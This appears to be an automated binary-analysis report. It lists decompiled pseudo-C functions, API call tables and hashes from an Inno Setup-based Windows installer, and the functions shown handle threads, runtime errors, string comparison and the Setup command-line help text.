                                                                    0x00000000
                                                                    0x00406800
                                                                    0x00000000
                                                                    0x00406751
                                                                    0x004066c4
                                                                    0x004066ca
                                                                    0x004066d0
                                                                    0x0040672c
                                                                    0x0040672f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406736
                                                                    0x0040673e
                                                                    0x00406744
                                                                    0x0040674f
                                                                    0x00000000
                                                                    0x0040674f
                                                                    0x00406746
                                                                    0x00000000
                                                                    0x00406746
                                                                    0x00000000
                                                                    0x004066d2
                                                                    0x004066d5
                                                                    0x00000000
                                                                    0x004066e4
                                                                    0x004066e4
                                                                    0x004066e4
                                                                    0x00000000
                                                                    0x004066ed
                                                                    0x004066f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004066f5
                                                                    0x0040671e
                                                                    0x00406722
                                                                    0x00406727
                                                                    0x0040672a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040672a
                                                                    0x004066fe
                                                                    0x00406704
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040670b
                                                                    0x0040670e
                                                                    0x00406715
                                                                    0x00000000
                                                                    0x00406715
                                                                    0x00406811
                                                                    0x0040681c

                                                                    APIs
                                                                      • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                    • GetTickCount.KERNEL32 ref: 004066BF
                                                                    • GetTickCount.KERNEL32 ref: 004066D7
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                    • GetTickCount.KERNEL32 ref: 00406731
                                                                    • GetTickCount.KERNEL32 ref: 00406768
                                                                    • GetTickCount.KERNEL32 ref: 00406792
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick$CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 3968769311-0
                                                                    • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                    • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                                    • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                                    • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                                    0x004971ac
                                                                    0x004971ac
                                                                    0x004971ac
                                                                    0x004971ad
                                                                    0x004971af
                                                                    0x004971b6
                                                                    0x004971bb
                                                                    0x004971bd
                                                                    0x004971c0
                                                                    0x004971c0
                                                                    0x004971c5
                                                                    0x004971c7
                                                                    0x004971ca
                                                                    0x004971ce
                                                                    0x004971cf
                                                                    0x004971d4
                                                                    0x004971d7
                                                                    0x004971de
                                                                    0x004971e3
                                                                    0x004971e9
                                                                    0x004971ee
                                                                    0x004971f6
                                                                    0x004971fa
                                                                    0x004971fa
                                                                    0x004971fa
                                                                    0x004971fc
                                                                    0x00497203
                                                                    0x00497284
                                                                    0x0049728c
                                                                    0x00497205
                                                                    0x00497209
                                                                    0x0049722c
                                                                    0x0049723e
                                                                    0x0049720b
                                                                    0x00497211
                                                                    0x00497224
                                                                    0x00497224
                                                                    0x00497245
                                                                    0x00497251
                                                                    0x00497259
                                                                    0x0049725c
                                                                    0x00497266
                                                                    0x00497273
                                                                    0x00497278
                                                                    0x00497278
                                                                    0x00497245
                                                                    0x00497291
                                                                    0x00497294
                                                                    0x00497297
                                                                    0x004972a4

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                                      • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                                    • GetCurrentThread.KERNEL32 ref: 0049727F
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                    • String ID: 0@G$XtI$l@
                                                                    • API String ID: 3539746228-385768319
                                                                    • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                    • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                                    • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                                    • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 36%
                                                                    			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                    0x00406425
                                                                    0x00406427
                                                                    0x0040642c
                                                                    0x00406446
                                                                    0x004064d9
                                                                    0x004064d9
                                                                    0x00000000
                                                                    0x0040644c
                                                                    0x0040644c
                                                                    0x0040644f
                                                                    0x00406450
                                                                    0x00406452
                                                                    0x00406459
                                                                    0x00000000
                                                                    0x00406465
                                                                    0x0040646d
                                                                    0x00406472
                                                                    0x00406473
                                                                    0x00406478
                                                                    0x0040647b
                                                                    0x00406481
                                                                    0x00406485
                                                                    0x00406486
                                                                    0x0040648b
                                                                    0x00406492
                                                                    0x004064bc
                                                                    0x004064be
                                                                    0x004064c1
                                                                    0x004064c4
                                                                    0x004064d1
                                                                    0x00406494
                                                                    0x00406494
                                                                    0x004064af
                                                                    0x004064b2
                                                                    0x004064ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004064ba
                                                                    0x004064a5
                                                                    0x004064a8
                                                                    0x004064e0
                                                                    0x004064e6
                                                                    0x004064e6
                                                                    0x00406492
                                                                    0x00406459
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 4275029093-79381301
                                                                    • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                    • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                                    • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                                    • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                    0x004076c0
                                                                    0x00407726
                                                                    0x00407728
                                                                    0x0040772a
                                                                    0x0040772f
                                                                    0x00407734
                                                                    0x00407736
                                                                    0x00407736
                                                                    0x0040773c
                                                                    0x004076c2
                                                                    0x004076cb
                                                                    0x004076db
                                                                    0x004076db
                                                                    0x004076f7
                                                                    0x0040770a
                                                                    0x0040771e
                                                                    0x0040771e

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 3320372497-2970929446
                                                                    • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                    • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                                    • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                                    • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                                    0x00420532
                                                                    0x0042055f
                                                                    0x00420564
                                                                    0x00420569
                                                                    0x00420573
                                                                    0x00420534
                                                                    0x00420544
                                                                    0x00420549
                                                                    0x0042054e
                                                                    0x0042054e

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc
                                                                    • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                                    • API String ID: 1883125708-3870080525
                                                                    • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                    • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                                    • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                                    • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                    0x0042931c
                                                                    0x00429328
                                                                    0x0042932e
                                                                    0x00429334
                                                                    0x00429344
                                                                    0x0042934b
                                                                    0x0042934b
                                                                    0x00429356
                                                                    0x00429364
                                                                    0x004294ef
                                                                    0x004294f6
                                                                    0x004294f7
                                                                    0x00000000
                                                                    0x0042936a
                                                                    0x0042936d
                                                                    0x0042938b
                                                                    0x0042936f
                                                                    0x0042937a
                                                                    0x0042937a
                                                                    0x0042939a
                                                                    0x004293a6
                                                                    0x004293a9
                                                                    0x00429416
                                                                    0x0042941c
                                                                    0x0042941d
                                                                    0x00429423
                                                                    0x00429424
                                                                    0x00429426
                                                                    0x0042942b
                                                                    0x0042942f
                                                                    0x00429431
                                                                    0x00429431
                                                                    0x0042943c
                                                                    0x00429447
                                                                    0x00429452
                                                                    0x0042945b
                                                                    0x0042945e
                                                                    0x0042947a
                                                                    0x00429481
                                                                    0x0042948c
                                                                    0x004294a3
                                                                    0x004294a8
                                                                    0x004294bc
                                                                    0x004294c1
                                                                    0x004294d4
                                                                    0x004294d4
                                                                    0x004294dd
                                                                    0x00429460
                                                                    0x00429460
                                                                    0x00429461
                                                                    0x00429467
                                                                    0x0042946d
                                                                    0x0042946f
                                                                    0x00429471
                                                                    0x00429474
                                                                    0x00429477
                                                                    0x00429477
                                                                    0x0042947a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042947a
                                                                    0x004293ab
                                                                    0x004293ab
                                                                    0x004293ac
                                                                    0x004293ae
                                                                    0x004293b4
                                                                    0x004293b6
                                                                    0x004293c5
                                                                    0x004293c6
                                                                    0x004293d0
                                                                    0x004293d1
                                                                    0x004293d6
                                                                    0x004293e1
                                                                    0x004293e2
                                                                    0x004293ec
                                                                    0x004293ed
                                                                    0x004293f2
                                                                    0x0042940d
                                                                    0x0042940f
                                                                    0x00429410
                                                                    0x00429413
                                                                    0x00429413
                                                                    0x00000000
                                                                    0x004293b4
                                                                    0x004293a9

                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                    • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                                    • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                                    • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 34%
                                                                    			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                                    0x004afa44
                                                                    0x004afa44
                                                                    0x004afa47
                                                                    0x004afa49
                                                                    0x004afa4c
                                                                    0x004afa50
                                                                    0x004afa51
                                                                    0x004afa56
                                                                    0x004afa59
                                                                    0x004afa63
                                                                    0x004afa77
                                                                    0x004afa65
                                                                    0x004afa6d
                                                                    0x004afa6d
                                                                    0x004afa7c
                                                                    0x004afa81
                                                                    0x004afa84
                                                                    0x004afa85
                                                                    0x004afa8a
                                                                    0x004afa97
                                                                    0x004afaae
                                                                    0x004afab5
                                                                    0x004afab8
                                                                    0x004afabb
                                                                    0x004afacd

                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                    Strings
                                                                    • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                                    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                                    • Setup, xrefs: 004AFA9E
                                                                    • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
